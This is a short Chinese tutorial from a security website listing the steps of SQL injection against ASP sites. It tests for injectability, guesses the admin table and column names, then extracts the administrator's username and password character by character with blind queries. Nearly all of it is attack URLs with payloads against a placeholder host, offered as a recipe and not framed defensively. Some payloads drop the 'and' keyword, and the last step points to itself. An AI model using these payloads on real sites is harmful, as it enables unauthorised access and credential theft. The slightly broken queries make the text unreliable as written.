频道栏目
首页 > 资讯 > 网站安全 > 正文

SQL注入利用的几大步骤

05-05-11        来源:[db:作者]  
收藏   我要投稿

http://www.spking.com/

我写得很简略,但应该都能看得懂!以后概不回答此类问题!请不要把帖子转来转去,不是什么NB技术,几乎都是死东西,怕丢人!

第一步:
http://www.aaa.com/./show.asp?id=259
http://www.aaa.com/./show.asp?id=259 and 1=1
http://www.aaa.com/./show.asp?id=259 and 1=2
简单判断是否可以注入


第二步:
猜测管理员登陆界面!什么admin.asp、admin_admin.asp之类的,猜不出来的话,快点想别的出路!猜出来了再继续猜:
http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20*%20from%20admin)
然后猜测登陆账户存在于哪个表中,这里猜的是admin。(假设存在)


第三步:
接下来是个关键!猜测admin表中有哪些字段,下面三条分别是id、username、password是否存在的猜测(假设都存在)。可以根据上面登陆界面里的变量名来猜字段!
http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20id%20from%20admin)
http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20username%20from%20admin)
http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20password%20from%20admin)


第四步:
http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20id%20from%20admin%20where%20id=1)
猜测admin的ID是多少,注意我用的语法格式,这里假设猜出来ID=1。

http://www.aaa.com/./show.asp?id=259and%20exists%20(select%20id%20from%20admin%20where len(username)=6%20and%20id=1)
猜测username长度是否为6。

http://www.aaa.com/./show.asp?id=259%20exists%20(select%20id%20from%20admin%20where%20asc(mid(username,1,1))>110%20and%20id=1)
然后再猜他的用户名是什么,有的时候不能用mid,所以我一般都是直接用left函数猜,比如:
http://www.aaa.com/./show.asp?id=259%20exists%20(select%20id%20from%20admin%20where%20left(username,1)=a)

第五步:
重复第五步,只不过将username换成password而已。

相关TAG标签
上一篇:服务器无法访问的应对策略
下一篇:常见ASP程序漏洞---防范补救篇
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站